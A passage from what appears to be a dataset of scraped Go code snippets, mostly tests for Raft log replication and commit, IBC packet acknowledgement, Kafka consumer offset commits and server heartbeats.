the\n\t// pending command can now commit.\n\tr.removeNode(2)\n\tents = nextEnts(r, s)\n\tif len(ents) != 1 || ents[0].Type != pb.EntryNormal ||\n\t\tstring(ents[0].Data) != \"hello\" {\n\t\tt.Fatalf(\"expected one committed EntryNormal, got %v\", ents)\n\t}\n}", "func (s *raftState) checkLeaderCommit() bool {\n\tmatches := make([]int, 0, len(s.MatchIndex))\n\tfor _, x := range s.MatchIndex {\n\t\tmatches = append(matches, x)\n\t}\n\tsort.Sort(sort.Reverse(sort.IntSlice(matches)))\n\tnewC := matches[s.majority()-1]\n\tif newC > s.CommitIndex {\n\t\ts.commitUntil(newC)\n\t\tglog.V(utils.VDebug).Infof(\"%s Leader update commitIndex: %d\", s.String(), newC)\n\t\treturn true\n\t}\n\treturn false\n}", "func (suite *HandlerTestSuite) TestHandleAcknowledgePacket() {\n\tvar (\n\t\tpacket channeltypes.Packet\n\t)\n\n\ttestCases := []struct {\n\t\tname string\n\t\tmalleate func()\n\t\texpPass bool\n\t}{\n\t\t{\"success: ORDERED\", func() {\n\t\t\tclientA, clientB, connA, connB := suite.coordinator.SetupClientConnections(suite.chainA, suite.chainB, clientexported.Tendermint)\n\t\t\tchannelA, channelB := suite.coordinator.CreateChannel(suite.chainA, suite.chainB, connA, connB, channeltypes.ORDERED)\n\t\t\tpacket = channeltypes.NewPacket(suite.chainA.GetPacketData(suite.chainB), 1, channelA.PortID, channelA.ID, channelB.PortID, channelB.ID, timeoutHeight, 0)\n\n\t\t\terr := suite.coordinator.SendPacket(suite.chainA, suite.chainB, packet, clientB)\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\terr = suite.coordinator.PacketExecuted(suite.chainB, suite.chainA, packet, clientA)\n\t\t\tsuite.Require().NoError(err)\n\t\t}, true},\n\t\t{\"success: UNORDERED\", func() {\n\t\t\tclientA, clientB, _, _, channelA, channelB := suite.coordinator.Setup(suite.chainA, suite.chainB)\n\t\t\tpacket = channeltypes.NewPacket(suite.chainA.GetPacketData(suite.chainB), 1, channelA.PortID, channelA.ID, channelB.PortID, channelB.ID, timeoutHeight, 0)\n\n\t\t\terr := suite.coordinator.SendPacket(suite.chainA, suite.chainB, packet, clientB)\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\terr = suite.coordinator.PacketExecuted(suite.chainB, suite.chainA, packet, clientA)\n\t\t\tsuite.Require().NoError(err)\n\t\t}, true},\n\t\t{\"success: UNORDERED acknowledge out of order packet\", func() {\n\t\t\t// setup uses an UNORDERED channel\n\t\t\tclientA, clientB, _, _, channelA, channelB := suite.coordinator.Setup(suite.chainA, suite.chainB)\n\n\t\t\t// attempts to acknowledge ack with sequence 10 without acknowledging ack with sequence 1 (removing packet commitment)\n\t\t\tfor i := uint64(1); i < 10; i++ {\n\t\t\t\tpacket = channeltypes.NewPacket(suite.chainA.GetPacketData(suite.chainB), i, channelA.PortID, channelA.ID, channelB.PortID, channelB.ID, timeoutHeight, 0)\n\n\t\t\t\terr := suite.coordinator.SendPacket(suite.chainA, suite.chainB, packet, clientB)\n\t\t\t\tsuite.Require().NoError(err)\n\n\t\t\t\terr = suite.coordinator.PacketExecuted(suite.chainB, suite.chainA, packet, clientA)\n\t\t\t\tsuite.Require().NoError(err)\n\n\t\t\t}\n\t\t}, true},\n\t\t{\"failure: ORDERED acknowledge out of order packet\", func() {\n\t\t\tclientA, clientB, connA, connB := suite.coordinator.SetupClientConnections(suite.chainA, suite.chainB, clientexported.Tendermint)\n\t\t\tchannelA, channelB := suite.coordinator.CreateChannel(suite.chainA, suite.chainB, connA, connB, channeltypes.ORDERED)\n\n\t\t\t// attempts to acknowledge ack with sequence 10 without acknowledging ack with sequence 1 (removing packet commitment\n\t\t\tfor i := uint64(1); i < 10; i++ {\n\t\t\t\tpacket = channeltypes.NewPacket(suite.chainA.GetPacketData(suite.chainB), i, channelA.PortID, channelA.ID, channelB.PortID, channelB.ID, timeoutHeight, 0)\n\n\t\t\t\terr := suite.coordinator.SendPacket(suite.chainA, suite.chainB, packet, clientB)\n\t\t\t\tsuite.Require().NoError(err)\n\n\t\t\t\terr = suite.coordinator.PacketExecuted(suite.chainB, suite.chainA, packet, clientA)\n\t\t\t\tsuite.Require().NoError(err)\n\t\t\t}\n\t\t}, false},\n\t\t{\"channel does not exist\", func() {\n\t\t\t// any non-nil value of packet is valid\n\t\t\tsuite.Require().NotNil(packet)\n\t\t}, false},\n\t\t{\"packet not received\", func() {\n\t\t\t_, clientB, _, _, channelA, channelB := suite.coordinator.Setup(suite.chainA, suite.chainB)\n\t\t\tpacket = channeltypes.NewPacket(suite.chainA.GetPacketData(suite.chainB), 1, channelA.PortID, channelA.ID, channelB.PortID, channelB.ID, timeoutHeight, 0)\n\n\t\t\terr := suite.coordinator.SendPacket(suite.chainA, suite.chainB, packet, clientB)\n\t\t\tsuite.Require().NoError(err)\n\t\t}, false},\n\t\t{\"ORDERED: packet already acknowledged (replay)\", func() {\n\t\t\tclientA, clientB, connA, connB := suite.coordinator.SetupClientConnections(suite.chainA, suite.chainB, clientexported.Tendermint)\n\t\t\tchannelA, channelB := suite.coordinator.CreateChannel(suite.chainA, suite.chainB, connA, connB, channeltypes.ORDERED)\n\t\t\tpacket = channeltypes.NewPacket(suite.chainA.GetPacketData(suite.chainB), 1, channelA.PortID, channelA.ID, channelB.PortID, channelB.ID, timeoutHeight, 0)\n\n\t\t\terr := suite.coordinator.SendPacket(suite.chainA, suite.chainB, packet, clientB)\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\terr = suite.coordinator.PacketExecuted(suite.chainB, suite.chainA, packet, clientA)\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\terr = suite.coordinator.AcknowledgementExecuted(suite.chainA, suite.chainB, packet, clientB)\n\t\t\tsuite.Require().NoError(err)\n\t\t}, false},\n\t\t{\"UNORDERED: packet already received (replay)\", func() {\n\t\t\tclientA, clientB, _, _, channelA, channelB := suite.coordinator.Setup(suite.chainA, suite.chainB)\n\n\t\t\tpacket = channeltypes.NewPacket(suite.chainA.GetPacketData(suite.chainB), 1, channelA.PortID, channelA.ID, channelB.PortID, channelB.ID, timeoutHeight, 0)\n\n\t\t\terr := suite.coordinator.SendPacket(suite.chainA, suite.chainB, packet, clientB)\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\terr = suite.coordinator.PacketExecuted(suite.chainB, suite.chainA, packet, clientA)\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\terr = suite.coordinator.AcknowledgementExecuted(suite.chainA, suite.chainB, packet, clientB)\n\t\t\tsuite.Require().NoError(err)\n\t\t}, false},\n\t}\n\n\tfor _, tc := range testCases {\n\t\ttc := tc\n\n\t\tsuite.Run(tc.name, func() {\n\t\t\tsuite.SetupTest() // reset\n\t\t\tibctesting.TestHash = ibctransfertypes.FungibleTokenPacketAcknowledgement{true, \"\"}.GetBytes()\n\n\t\t\thandler := ibc.NewHandler(*suite.chainA.App.IBCKeeper)\n\n\t\t\ttc.malleate()\n\n\t\t\tpacketKey := host.KeyPacketAcknowledgement(packet.GetDestPort(), packet.GetDestChannel(), packet.GetSequence())\n\t\t\tproof, proofHeight := suite.chainB.QueryProof(packetKey)\n\n\t\t\tack := ibctesting.TestHash\n\n\t\t\tmsg := channeltypes.NewMsgAcknowledgement(packet, ack, proof, proofHeight, suite.chainA.SenderAccount.GetAddress())\n\n\t\t\t_, err := handler(suite.chainA.GetContext(), msg)\n\n\t\t\tif tc.expPass {\n\t\t\t\tsuite.Require().NoError(err)\n\n\t\t\t\t// replay should an error\n\t\t\t\t_, err := handler(suite.chainA.GetContext(), msg)\n\t\t\t\tsuite.Require().Error(err)\n\n\t\t\t\t// verify packet commitment was deleted\n\t\t\t\thas := suite.chainA.App.IBCKeeper.ChannelKeeper.HasPacketCommitment(suite.chainA.GetContext(), packet.GetDestPort(), packet.GetDestChannel(), packet.GetSequence())\n\t\t\t\tsuite.Require().False(has)\n\n\t\t\t} else {\n\t\t\t\tsuite.Require().Error(err)\n\t\t\t}\n\t\t})\n\t}\n}", "func consumerTestWithCommits(t *testing.T, testname string, msgcnt int, useChannel bool, consumeFunc func(c *Consumer, mt *msgtracker, expCnt int), rebalanceCb func(c *Consumer, event Event) error) {\n\tconsumerTest(t, testname+\" auto commit\",\n\t\tmsgcnt, consumerCtrl{useChannel: useChannel, autoCommit: true}, consumeFunc, rebalanceCb)\n\n\tconsumerTest(t, testname+\" using CommitMessage() API\",\n\t\tmsgcnt, consumerCtrl{useChannel: useChannel, commitMode: ViaCommitMessageAPI}, consumeFunc, rebalanceCb)\n\n\tconsumerTest(t, testname+\" using CommitOffsets() API\",\n\t\tmsgcnt, consumerCtrl{useChannel: useChannel, commitMode: ViaCommitOffsetsAPI}, consumeFunc, rebalanceCb)\n\n\tconsumerTest(t, testname+\" using Commit() API\",\n\t\tmsgcnt, consumerCtrl{useChannel: useChannel, commitMode: ViaCommitAPI}, consumeFunc, rebalanceCb)\n\n}", "func TestLogReplication2(t *testing.T) {\n\tack := make(chan bool)\n\n\t//Kill one server\n\traft.KillServer(1)\n\n\t//Append log to server\n\ttime.AfterFunc(1*time.Second, func() {\n\t\t//Get leader\n\t\tleaderId := raft.GetLeaderId()\n\n\t\t//Append a log entry to leader as client\n\t\traft.InsertFakeLogEntry(leaderId)\n\t})\n\n\t//Resurrect old server after enough time for other to move on\n\ttime.AfterFunc(2*time.Second, func() {\n\t\t//Resurrect old server\n\t\traft.ResurrectServer(1)\n\t})\n\n\t//Check log after some time to see if it matches with current leader\n\ttime.AfterFunc(3*time.Second, func() {\n\t\tleaderId := raft.GetLeaderId()\n\t\tleaderLog := raft.GetLogAsString(leaderId)\n\t\tserverLog := raft.GetLogAsString(1)\n\n\t\tcheckIfExpected(t, serverLog, leaderLog)\n\n\t\tack <- true\n\t})\n\n\t<-ack\n\n}", "func TestCannotCommitWithoutNewTermEntry(t *testing.T) {\n\ttt := newNetwork(nil, nil, nil, nil, nil)\n\tdefer tt.closeAll()\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// 0 cannot reach 2,3,4\n\ttt.cut(1, 3)\n\ttt.cut(1, 4)\n\ttt.cut(1, 5)\n\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\tsm := tt.peers[1].(*raft)\n\tif sm.raftLog.committed != 1 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 1)\n\t}\n\n\t// network recovery\n\ttt.recover()\n\t// avoid committing ChangeTerm proposal\n\ttt.ignore(pb.MsgApp)\n\n\t// elect 2 as the new leader with term 2\n\ttt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// no log entries from previous term should be committed\n\tsm = tt.peers[2].(*raft)\n\tif sm.raftLog.committed != 1 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 1)\n\t}\n\n\ttt.recover()\n\t// send heartbeat; reset wait\n\ttt.send(pb.Message{From: 2, To: 2, Type: pb.MsgBeat})\n\t// append an entry at current term\n\ttt.send(pb.Message{From: 2, To: 2, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\t// expect the committed to be advanced\n\tif sm.raftLog.committed != 5 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 5)\n\t}\n}", "func TestCommitConflictRepeat4A(t *testing.T) {\n}", "func (c *Consumer) Commit() error {\n\tsnap := c.resetAcked()\n\tif len(snap) < 1 {\n\t\treturn nil\n\t}\n\n\tfor partitionID, offset := range snap {\n\t\t// fmt.Printf(\"$,%s,%d,%d\\n\", c.id, partitionID, offset+1)\n\t\tif err := c.zoo.Commit(c.group, c.topic, partitionID, offset+1); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}", "func TestCommitConflictRace4A(t *testing.T) {\n}", "func (s *PartitionCsmSuite) TestSparseAckedCommitted(c *C) {\n\toffsetsBefore := s.kh.GetOldestOffsets(topic)\n\tacks := []bool{\n\t\t/* 0 */ true,\n\t\t/* 1 */ false,\n\t\t/* 2 */ true,\n\t\t/* 3 */ true,\n\t\t/* 4 */ true,\n\t\t/* 5 */ false,\n\t\t/* 6 */ false,\n\t\t/* 7 */ true,\n\t\t/* 8 */ true,\n\t\t/* 9 */ false,\n\t}\n\ts.kh.SetOffsets(group, topic, []offsetmgr.Offset{{Val: sarama.OffsetOldest}})\n\n\tpc := Spawn(s.ns, group, topic, partition, s.cfg, s.groupMember, s.msgIStreamF, s.offsetMgrF)\n\n\t// When\n\tfor _, shouldAck := range acks {\n\t\tmsg := <-pc.Messages()\n\t\tsendEOffered(msg)\n\t\tif shouldAck {\n\t\t\tsendEAcked(msg)\n\t\t}\n\t}\n\tpc.Stop()\n\n\t// Then\n\toffsetsAfter := s.kh.GetCommittedOffsets(group, topic)\n\tc.Assert(offsetsAfter[partition].Val, Equals, offsetsBefore[partition]+1)\n\tc.Assert(offsettrac.SparseAcks2Str(offsetsAfter[partition]), Equals, \"1-4,6-8\")\n}", "func (s *PartitionCsmSuite) TestSparseAckedCommitted(c *C) {\n\toffsetsBefore := s.kh.GetOldestOffsets(topic)\n\tacks := []bool{\n\t\t/* 0 */ true,\n\t\t/* 1 */ false,\n\t\t/* 2 */ true,\n\t\t/* 3 */ true,\n\t\t/* 4 */ true,\n\t\t/* 5 */ false,\n\t\t/* 6 */ false,\n\t\t/* 7 */ true,\n\t\t/* 8 */ true,\n\t\t/* 9 */ false,\n\t}\n\ts.kh.SetOffsetValues(group, topic, offsetsBefore)\n\n\tpc := Spawn(s.ns, group, topic, partition, s.cfg, s.groupMember, s.msgFetcherF, s.offsetMgrF)\n\n\t// When\n\tfor _, shouldAck := range acks {\n\t\tmsg := <-pc.Messages()\n\t\tsendEvOffered(msg)\n\t\tif shouldAck {\n\t\t\tsendEvAcked(msg)\n\t\t}\n\t}\n\tpc.Stop()\n\n\t// Then\n\toffsetsAfter := s.kh.GetCommittedOffsets(group, topic)\n\tc.Assert(offsetsAfter[partition].Val, Equals, offsetsBefore[partition]+1)\n\tc.Assert(offsettrk.SparseAcks2Str(offsetsAfter[partition]), Equals, \"1-4,6-8\")\n}", "func TestSingleCommit4A(t *testing.T) {\n}", "func TestCommitConflictRollback4A(t *testing.T) {\n}", "func (s *Service) onOffsetCommit(brokerId int32, duration time.Duration) {\n\n\t// todo:\n\t// if the commit took too long, don't count it in 'commits' but add it to the histogram?\n\t// and how do we want to handle cases where we get an error??\n\t// should we have another metric that tells us about failed commits? or a label on the counter?\n\tbrokerIdStr := fmt.Sprintf(\"%v\", brokerId)\n\ts.endToEndCommitLatency.WithLabelValues(brokerIdStr).Observe(duration.Seconds())\n\n\tif duration > s.config.Consumer.CommitSla {\n\t\treturn\n\t}\n\n\ts.endToEndCommits.Inc()\n}", "func TestCommitMissingPrewrite4a(t *testing.T) {\n}", "func TestEmptyCommit4A(t *testing.T) {\n}", "func TestRecommitKey4A(t *testing.T) {\n}", "func TestCommitOverwrite4A(t *testing.T) {\n}", "func TestHeartbeatAnnounce(t *testing.T) {\n\tt.Parallel()\n\n\ttests := []struct {\n\t\tmode HeartbeatMode\n\t\tkind string\n\t}{\n\t\t{mode: HeartbeatModeProxy, kind: types.KindProxy},\n\t\t{mode: HeartbeatModeAuth, kind: types.KindAuthServer},\n\t}\n\tfor _, tt := range tests {\n\t\tt.Run(tt.mode.String(), func(t *testing.T) {\n\t\t\tctx, cancel := context.WithCancel(context.Background())\n\t\t\tdefer cancel()\n\t\t\tclock := clockwork.NewFakeClock()\n\n\t\t\tannouncer := newFakeAnnouncer(ctx)\n\t\t\thb, err := NewHeartbeat(HeartbeatConfig{\n\t\t\t\tContext: ctx,\n\t\t\t\tMode: tt.mode,\n\t\t\t\tComponent: \"test\",\n\t\t\t\tAnnouncer: announcer,\n\t\t\t\tCheckPeriod: time.Second,\n\t\t\t\tAnnouncePeriod: 60 * time.Second,\n\t\t\t\tKeepAlivePeriod: 10 * time.Second,\n\t\t\t\tServerTTL: 600 * time.Second,\n\t\t\t\tClock: clock,\n\t\t\t\tGetServerInfo: func() (types.Resource, error) {\n\t\t\t\t\tsrv := &types.ServerV2{\n\t\t\t\t\t\tKind: tt.kind,\n\t\t\t\t\t\tVersion: types.V2,\n\t\t\t\t\t\tMetadata: types.Metadata{\n\t\t\t\t\t\t\tNamespace: apidefaults.Namespace,\n\t\t\t\t\t\t\tName: \"1\",\n\t\t\t\t\t\t},\n\t\t\t\t\t\tSpec: types.ServerSpecV2{\n\t\t\t\t\t\t\tAddr: \"127.0.0.1:1234\",\n\t\t\t\t\t\t\tHostname: \"2\",\n\t\t\t\t\t\t},\n\t\t\t\t\t}\n\t\t\t\t\tsrv.SetExpiry(clock.Now().UTC().Add(apidefaults.ServerAnnounceTTL))\n\t\t\t\t\treturn srv, nil\n\t\t\t\t},\n\t\t\t})\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, hb.state, HeartbeatStateInit)\n\n\t\t\t// on the first run, heartbeat will move to announce state,\n\t\t\t// will call announce right away\n\t\t\terr = hb.fetch()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, hb.state, HeartbeatStateAnnounce)\n\n\t\t\terr = hb.announce()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, announcer.upsertCalls[hb.Mode], 1)\n\t\t\trequire.Equal(t, hb.state, HeartbeatStateAnnounceWait)\n\t\t\trequire.Equal(t, hb.nextAnnounce, clock.Now().UTC().Add(hb.AnnouncePeriod))\n\n\t\t\t// next call will not move to announce, because time is not up yet\n\t\t\terr = hb.fetchAndAnnounce()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, hb.state, HeartbeatStateAnnounceWait)\n\n\t\t\t// advance time, and heartbeat will move to announce\n\t\t\tclock.Advance(hb.AnnouncePeriod + time.Second)\n\t\t\terr = hb.fetch()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, hb.state, HeartbeatStateAnnounce)\n\t\t\terr = hb.announce()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, announcer.upsertCalls[hb.Mode], 2)\n\t\t\trequire.Equal(t, hb.state, HeartbeatStateAnnounceWait)\n\t\t\trequire.Equal(t, hb.nextAnnounce, clock.Now().UTC().Add(hb.AnnouncePeriod))\n\n\t\t\t// in case of error, system will move to announce wait state,\n\t\t\t// with next attempt scheduled on the next keep alive period\n\t\t\tannouncer.err = trace.ConnectionProblem(nil, \"boom\")\n\t\t\tclock.Advance(hb.AnnouncePeriod + time.Second)\n\t\t\terr = hb.fetchAndAnnounce()\n\t\t\trequire.Error(t, err)\n\t\t\trequire.True(t, trace.IsConnectionProblem(err))\n\t\t\trequire.Equal(t, announcer.upsertCalls[hb.Mode], 3)\n\t\t\trequire.Equal(t, hb.state, HeartbeatStateAnnounceWait)\n\t\t\trequire.Equal(t, hb.nextAnnounce, clock.Now().UTC().Add(hb.KeepAlivePeriod))\n\n\t\t\t// once announce is successful, next announce is set on schedule\n\t\t\tannouncer.err = nil\n\t\t\tclock.Advance(hb.KeepAlivePeriod + time.Second)\n\t\t\terr = hb.fetchAndAnnounce()\n\t\t\trequire.NoError(t, err)\n\t\t\trequire.Equal(t, announcer.upsertCalls[hb.Mode], 4)\n\t\t\trequire.Equal(t, hb.state, HeartbeatStateAnnounceWait)\n\t\t\trequire.Equal(t, hb.nextAnnounce, clock.Now().UTC().Add(hb.AnnouncePeriod))\n\t\t})\n\t}\n}", "func TestCommitterSuccess(t *testing.T) {\n\te := []*transformer.Envelope{\n\t\t&transformer.Envelope{},\n\t\t&transformer.Envelope{},\n\t\t&transformer.Envelope{},\n\t}\n\n\tok := false\n\tc := NewCommitter(&dumbWriter{}, func(envs []*transformer.Envelope) error {\n\t\tok = len(envs) == len(e)\n\t\tfor i := range e {\n\t\t\tok = ok && (e[i] == envs[i])\n\t\t}\n\t\treturn nil\n\t})\n\n\terr := c.Write(e...)\n\tif err != nil {\n\t\tt.Fatalf(\"unexpected error %v\", err)\n\t}\n\tif !ok {\n\t\tt.Fatal(\"commit callback not invoked correctly\")\n\t}\n}", "func TestLeaderStartReplication(t *testing.T) {\n\ts := NewMemoryStorage()\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, s)\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\tcommitNoopEntry(r, s)\n\tli := r.raftLog.lastIndex()\n\n\tents := []pb.Entry{{Data: []byte(\"some data\")}}\n\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: ents})\n\n\tif g := r.raftLog.lastIndex(); g != li+1 {\n\t\tt.Errorf(\"lastIndex = %d, want %d\", g, li+1)\n\t}\n\tif g := r.raftLog.committed; g != li {\n\t\tt.Errorf(\"committed = %d, want %d\", g, li)\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\twents := []pb.Entry{{Index: li + 1, Term: 1, Data: []byte(\"some data\")}}\n\twmsgs := []pb.Message{\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2}, Term: 1, Type: pb.MsgApp, Index: li, LogTerm: 1, Entries: wents, Commit: li},\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3}, Term: 1, Type: pb.MsgApp, Index: li, LogTerm: 1, Entries: wents, Commit: li},\n\t}\n\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\tt.Errorf(\"msgs = %+v, want %+v\", msgs, wmsgs)\n\t}\n\tif g := r.raftLog.unstableEntries(); !reflect.DeepEqual(g, wents) {\n\t\tt.Errorf(\"ents = %+v, want %+v\", g, wents)\n\t}\n}", "func (suite *KeeperTestSuite) TestOnAcknowledgementPacket() {\n\tdata := types.NewFungibleTokenPacketData(prefixCoins2, testAddr1.String(), testAddr2.String())\n\n\tsuccessAck := types.FungibleTokenPacketAcknowledgement{\n\t\tSuccess: true,\n\t}\n\tfailedAck := types.FungibleTokenPacketAcknowledgement{\n\t\tSuccess: false,\n\t\tError: \"failed packet transfer\",\n\t}\n\n\ttestCases := []struct {\n\t\tmsg string\n\t\tack types.FungibleTokenPacketAcknowledgement\n\t\tmalleate func()\n\t\tsource bool\n\t\tsuccess bool // success of ack\n\t}{\n\t\t{\"success ack causes no-op\", successAck,\n\t\t\tfunc() {}, true, true},\n\t\t{\"successful refund from source chain\", failedAck,\n\t\t\tfunc() {\n\t\t\t\tescrow := types.GetEscrowAddress(testPort1, testChannel1)\n\t\t\t\t_, err := suite.chainA.App.BankKeeper.AddCoins(suite.chainA.GetContext(), escrow, sdk.NewCoins(sdk.NewCoin(\"atom\", sdk.NewInt(100))))\n\t\t\t\tsuite.Require().NoError(err)\n\t\t\t}, true, false},\n\t\t{\"successful refund from external chain\", failedAck,\n\t\t\tfunc() {\n\t\t\t\tdata.Amount = prefixCoins\n\t\t\t}, false, false},\n\t}\n\n\tpacket := channeltypes.NewPacket(data.GetBytes(), 1, testPort1, testChannel1, testPort2, testChannel2, 100, 0)\n\n\tfor i, tc := range testCases {\n\t\ttc := tc\n\t\ti := i\n\t\tsuite.Run(fmt.Sprintf(\"Case %s\", tc.msg), func() {\n\t\t\tsuite.SetupTest() // reset\n\n\t\t\ttc.malleate()\n\n\t\t\tvar denom string\n\t\t\tif tc.source {\n\t\t\t\tprefix := types.GetDenomPrefix(packet.GetDestPort(), packet.GetDestChannel())\n\t\t\t\tdenom = prefixCoins2[0].Denom[len(prefix):]\n\t\t\t} else {\n\t\t\t\tdenom = data.Amount[0].Denom\n\t\t\t}\n\n\t\t\tpreCoin := suite.chainA.App.BankKeeper.GetBalance(suite.chainA.GetContext(), testAddr1, denom)\n\n\t\t\terr := suite.chainA.App.TransferKeeper.OnAcknowledgementPacket(suite.chainA.GetContext(), packet, data, tc.ack)\n\t\t\tsuite.Require().NoError(err, \"valid test case %d failed: %s\", i, tc.msg)\n\n\t\t\tpostCoin := suite.chainA.App.BankKeeper.GetBalance(suite.chainA.GetContext(), testAddr1, denom)\n\t\t\tdeltaAmount := postCoin.Amount.Sub(preCoin.Amount)\n\n\t\t\tif tc.success {\n\t\t\t\tsuite.Require().Equal(sdk.ZeroInt(), deltaAmount, \"successful ack changed balance\")\n\t\t\t} else {\n\t\t\t\tsuite.Require().Equal(prefixCoins2[0].Amount, deltaAmount, \"failed ack did not trigger refund\")\n\t\t\t}\n\t\t})\n\t}\n}", "func TestLogRecovery(t *testing.T) {\n\tpath := setupLog(\n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\" +\n\t\t`6ac5807c 0000000000000003 00000000000`)\n\tlog := NewLog()\n\tlog.AddCommandType(&TestCommand1{})\n\tlog.AddCommandType(&TestCommand2{})\n\tif err := log.Open(path); err != nil {\n\t\tt.Fatalf(\"Unable to open log: %v\", err)\n\t}\n\tdefer log.Close()\n\tdefer os.Remove(path)\n\n\tif err := log.Append(NewLogEntry(log, 3, 2, &TestCommand1{\"bat\", -5})); err != nil {\n\t\tt.Fatalf(\"Unable to append: %v\", err)\n\t}\n\n\t// Validate existing log entries.\n\tif len(log.entries) != 3 {\n\t\tt.Fatalf(\"Expected 2 entries, got %d\", len(log.entries))\n\t}\n\tif !reflect.DeepEqual(log.entries[0], NewLogEntry(log, 1, 1, &TestCommand1{\"foo\", 20})) {\n\t\tt.Fatalf(\"Unexpected entry[0]: %v\", log.entries[0])\n\t}\n\tif !reflect.DeepEqual(log.entries[1], NewLogEntry(log, 2, 1, &TestCommand2{100})) {\n\t\tt.Fatalf(\"Unexpected entry[1]: %v\", log.entries[1])\n\t}\n\tif !reflect.DeepEqual(log.entries[2], NewLogEntry(log, 3, 2, &TestCommand1{\"bat\", -5})) {\n\t\tt.Fatalf(\"Unexpected entry[2]: %v\", log.entries[2])\n\t}\n\n\t// Validate precommit log contents.\n\texpected :=\n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\"\n\tactual, _ := ioutil.ReadFile(path)\n\tif string(actual) != expected {\n\t\tt.Fatalf(\"Unexpected buffer:\\nexp:\\n%s\\ngot:\\n%s\", expected, string(actual))\n\t}\n\n\t// Validate committed log contents.\n\tif err := log.SetCommitIndex(3); err != nil {\n\t\tt.Fatalf(\"Unable to partially commit: %v\", err)\n\t}\n\texpected =\n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\" +\n\t\t`3f3f884c 0000000000000003 0000000000000002 cmd_1 {\"val\":\"bat\",\"i\":-5}`+\"\\n\"\n\tactual, _ = ioutil.ReadFile(path)\n\tif string(actual) != expected {\n\t\tt.Fatalf(\"Unexpected buffer:\\nexp:\\n%s\\ngot:\\n%s\", expected, string(actual))\n\t}\n}", "func (tc *consumer) Commit(topic string, partition int32, offset int64) error {\n\treturn nil\n}", "func TestReceiveConsensusSetUpdate(t *testing.T) {\n\tif testing.Short() {\n\t\tt.SkipNow()\n\t}\n\tht, err := newHostDBTester(\"TestFindHostAnnouncements\")\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Put a host announcement into the blockchain.\n\tannouncement := encoding.Marshal(modules.HostAnnouncement{\n\t\tIPAddress: ht.gateway.Address(),\n\t})\n\ttxnBuilder := ht.wallet.StartTransaction()\n\ttxnBuilder.AddArbitraryData(append(modules.PrefixHostAnnouncement[:], announcement...))\n\ttxnSet, err := txnBuilder.Sign(true)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\terr = ht.tpool.AcceptTransactionSet(txnSet)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Check that, prior to mining, the hostdb has no hosts.\n\tif len(ht.hostdb.AllHosts()) != 0 {\n\t\tt.Fatal(\"Hostdb should not yet have any hosts\")\n\t}\n\n\t// Mine a block to get the transaction into the consensus set.\n\tb, _ := ht.miner.FindBlock()\n\terr = ht.cs.AcceptBlock(b)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Check that there is now a host in the hostdb.\n\tif len(ht.hostdb.AllHosts()) != 1 {\n\t\tt.Fatal(\"hostdb should have a host after getting a host announcement transcation\")\n\t}\n}", "func TestHandleHeartbeat(t *testing.T) {\n\tcommit := uint64(2)\n\ttests := []struct {\n\t\tm pb.Message\n\t\twCommit uint64\n\t}{\n\t\t{pb.Message{From: 2, To: 1, Type: pb.MsgHeartbeat, Term: 2, Commit: commit + 1}, commit + 1},\n\t\t{pb.Message{From: 2, To: 1, Type: pb.MsgHeartbeat, Term: 2, Commit: commit - 1}, commit}, // do not decrease commit\n\t}\n\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tdefer storage.Close()\n\t\tstorage.Append([]pb.Entry{{Index: 1, Term: 1}, {Index: 2, Term: 2}, {Index: 3, Term: 3}})\n\t\tsm := newTestRaft(1, []uint64{1, 2}, 